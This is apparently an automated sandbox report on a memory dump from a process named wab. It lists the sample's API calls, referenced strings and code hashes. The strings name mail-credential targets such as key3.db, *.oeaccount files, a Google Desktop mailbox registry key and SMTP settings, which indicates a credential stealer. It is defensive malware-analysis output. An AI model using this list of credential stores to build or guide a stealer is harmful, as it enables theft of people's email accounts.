                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                APIs
                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                APIs
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                  • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                APIs
                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                • GetSysColor.USER32(00000005), ref: 004107A6
                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                APIs
                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                • String ID: Ul@$key3.db
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi$_mbscpy
                                • String ID: smtp
                                APIs
                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                • memset.MSVCRT ref: 00408258
                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                Strings
                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Close$EnumOpenmemset
                                • String ID: Software\Google\Google Desktop\Mailboxes
                                APIs
                                • memset.MSVCRT ref: 0040C28C
                                • SetFocus.USER32(?,?), ref: 0040C314
                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FocusMessagePostmemset
                                • String ID: S_@$l
                                APIs
                                • memset.MSVCRT ref: 004092C0
                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                • _mbscpy.MSVCRT ref: 004092FC
                                Strings
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString_mbscpymemset
                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy
                                • String ID: C^@$X$ini
                                APIs
                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                • String ID: MS Sans Serif
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClassName_strcmpimemset
                                • String ID: edit
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$_mbscat
                                • String ID: 3CD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: rows deleted
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                APIs
                                • __allrem.LIBCMT ref: 00425850
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                • __allrem.LIBCMT ref: 00425933
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                APIs
                                Strings
                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                • too many SQL variables, xrefs: 0042C6FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                • API String ID: 2221118986-515162456
                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                APIs
                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                • memset.MSVCRT ref: 004026AD
                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                  • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                • LocalFree.KERNEL32(?), ref: 004027A6
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                • String ID:
                                • API String ID: 1593657333-0
                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                APIs
                                • memset.MSVCRT ref: 0040C922
                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Message$MenuPostSendStringmemset
                                • String ID:
                                • API String ID: 3798638045-0
                                • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                APIs
                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                • strlen.MSVCRT ref: 0040B60B
                                • atoi.MSVCRT ref: 0040B619
                                • _mbsicmp.MSVCRT ref: 0040B66C
                                • _mbsicmp.MSVCRT ref: 0040B67F
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                • String ID:
                                • API String ID: 4107816708-0
                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                • String ID:
                                • API String ID: 1886415126-0
                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: >$>$>
                                • API String ID: 39653677-3911187716
                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: @
                                • API String ID: 3510742995-2766056989
                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                APIs
                                • strlen.MSVCRT ref: 0040797A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                  • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                  • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                • memcpy.MSVCRT ref: 004079DD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi
                                • String ID: C@$mail.identity
                                • API String ID: 1439213657-721921413
                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                APIs
                                • memset.MSVCRT ref: 00406640
                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                • memcmp.MSVCRT ref: 00406672
                                • memcpy.MSVCRT ref: 00406695
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset$memcmp
                                • String ID: Ul@
                                • API String ID: 270934217-715280498
                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                APIs
                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                • sprintf.MSVCRT ref: 0040B929
                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                • sprintf.MSVCRT ref: 0040B953
                                • _mbscat.MSVCRT ref: 0040B966
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 203655857-0
                                • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                APIs
                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                Strings
                                • recovered %d pages from %s, xrefs: 004188B4
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                • String ID: recovered %d pages from %s
                                • API String ID: 985450955-1623757624
                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _ultoasprintf
                                • String ID: %s %s %s
                                • API String ID: 432394123-3850900253
                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                APIs
                                • memset.MSVCRT ref: 00409919
                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: N\@
                                • API String ID: 568519121-3851889168
                                • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
